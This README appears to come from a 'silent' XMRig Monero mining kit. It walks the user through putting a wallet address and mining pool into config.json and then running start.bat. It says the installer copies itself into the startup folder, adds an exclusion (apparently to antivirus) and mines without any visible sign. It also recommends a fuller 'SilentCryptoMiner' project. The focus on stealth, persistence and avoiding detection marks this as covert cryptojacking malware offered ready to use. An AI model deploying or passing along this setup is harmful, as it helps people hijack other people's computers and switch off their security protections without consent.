Silent XMRig miner config with installer and startup.
This project is loosely put together, you should consider using this more complete project instead: https://github.com/UnamSanctam/SilentCryptoMiner
You will start by needing a Monero address and a monero mining pool, (MoneroOcean is default).
- Navigate to xmrig/config.json and edit the following lines:
{
"url": "gulf.moneroocean.stream:10128 ", # mining pool url (leave as default if you don't know what a mining pool is)
"user": "MONERO-ADDRESS-HERE", # your Monero address
"pass": "rig", # name of the machine that will be displayed on the mining pool
}
- Setup Complete!
- Run start.bat. The installer will copy itself to the startup folder, create an exclusion for it and will silently start mining Monero for you.
- If you did not change the mining pool line in config.json, head over to https://moneroocean.stream/ and enter your Monero address, you should start earning after a few minutes.